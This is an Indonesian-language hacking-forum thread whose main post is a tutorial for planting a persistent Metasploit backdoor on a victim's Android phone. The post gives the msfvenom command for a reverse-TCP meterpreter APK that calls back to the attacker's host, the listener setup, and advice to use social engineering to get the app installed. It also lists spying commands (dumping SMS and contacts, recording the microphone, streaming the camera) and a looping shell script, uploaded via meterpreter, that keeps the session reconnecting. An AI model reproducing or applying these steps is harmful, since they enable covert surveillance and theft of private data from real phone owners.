BackBox Indonesia
Persistents Android Backdoor All Network (Public/Local) - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Maintaining Access (https://www.backboxindonesia.or.id/forum-20.html)
+--- Thread: Persistents Android Backdoor All Network (Public/Local) (/thread-222.html)



Persistents Android Backdoor All Network (Public/Local) - penjagalilin - 06-11-2017

Menyebalkan ketika sudah mendapatkan sesi meterpreter namun mendadak disconnected di tengah jalan karena koneksi yang buruk. Untuk itu kita perlu backdoor yang dilengkapi persistensi supaya attacker dan korban bisa tetap kembali terhubung walau terputus ditengah jalan.



1. Biasanya kita menggunakan msfvenom untuk membuat sebuah backdoor yang nantinya akan ditanam di smarphone korban.

Code:
root@attackermachine:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_LISTENER_ATTACKER LPORT=PORT_LISTENER_ATTACKER R > /tmp/backdoor.apk

Keterangan 
LHOST : diisi dengan IP Address attacker yang akan digunakan untuk listening. Jika serangan dilakukan dijaringan lokal maka diisi IP komputer attacker. Jika serangan dilakukan pada korban/target yang berada diluar jaringan (Public / over Internet) maka masukkan IP Address Public attacker yang sudah dikonfigurasi untuk memiliki layanan port forwarding.
LPORT : diisi dengan Port dari IP attacker.
*Untuk via Public dalam contoh ini misalnya bisa memakai layanan forwarding dari platform Ngrok.com


2. Lalu attacker melakukan listening dengan modul multi handler dari msfconsole seperti berikut

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST IP_LISTENER_ATTACKER
msf exploit(handler) > set LPORT PORT_LISTENER_ATTACKER
msf exploit(handler) > exploit



3. Kemudian selanjutnya diperlukan Social Engineering terhadap korban supaya backdoor.apk didownload dan diinstall pada smartphone korban.


4. Saat korban menjalankan backdoor.apk maka akan terbuka sebuah sesi meterpreter seperti berikut

[Image: FFVQ4m46SYGH20jrSJsfHA.png]

Dari sini attacker sudah bisa melakukan aktivitas pada smartphone korban seperti dump_sms, dump_contacts, record_mic, webcam_snap, webcam_stream dan lain sebaginya. Jika sudah mari kita lanjutkan.


5. Selanjutnya kita akan buat sesi tersebut menjadi persistents. Maka buat sebuah file yang berisi script seperti berikut

Code:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Simpan script tersebut menjadi sebuah file berformat .sh misalnya sys.sh dan simpan dimana saja misalnya di /tmp/


6. Upload file tersebut ke smartphone korban via sesi meterpreter, upload di direktori /system/etc/init.d/ atau di /etc/init.d/ pada smartphone korban.

Code:
meterpreter > cd /system/etc/init.d/
meterpreter > upload /tmp/sys.sh

Namun hal ini memerlukan akses user root, jika smartphone sudah dalam keadaan rooted baiknya lakukan upload pada direktori ini. Namun jika belum rooted, maka solusinya pada post ini saya akan upload pada direktori /sdcard/Download/  dalam smartphone korban.

Code:
meterpreter > cd /sdcard/Download/
meterpreter > upload /tmp/sys.sh



7. Eksekusi file sys.sh tersebut dengan membuka sesi console lewat meterpreter dengan perintah shell.

Code:
meterpreter > shell

[Image: NRj9fatYSk_oNzTME9gCAg.png]

Kemudian jalankan perintah berikut.

Code:
cd /sdcard/Download/
sh sys.sh

Jika sukses akan muncul output seperti berikut

[Image: qwmkkNkHSVK7Lb3lq5mXdg.png]

Tekan Ctrl+C kemudian Y untuk keluar. Jangan kawatir, persistents akan tetap perjalan di smartphone korban. Dan selesai.



BUKTI

[Image: EzFNc2QQTc2ZaE0lAqAp1Q.png]

[Image: D8Iir9gaRd2Sjr2KZTCQuw.png]

Untuk pembuktian diatas saya menempatkan sesi meterpreter yang berjalan menjadi background dan menjalankan listener kembali secara berkali - kali, dan.. korban secara otomatis akan re-connect pada komputer attacker.



Bonus video :






Notes :
  • Jika smartphone korban dalam keadaan rooted dan IP+Port listener attacker adalah Static maka persistents akan berfungsi selamanya, meskipun korban melakukan reboot.
  • Saat korban menjalankan backdoor.apk yang sudah terinstall, maka persistents akan otomatis berjalan.
  • Bisa untuk jaringan Publik.
  • Bisa untuk jaringan Local, tentu saja.
  • Untuk menghentikan persistents di korban non-root, lakukan reboot pada smartphone korban.


Oke sekian post nya, semoga bermanfaat. Terimakasih.


RE: Persistents Android Backdoor All Network (Public/Local) - koboi - 06-11-2017

mantap (y)


RE: Persistents Android Backdoor All Network (Public/Local) - penjagalilin - 06-13-2017

(06-11-2017, 12:22 PM)koboi Wrote: mantap (y)

wadoo ampun suhu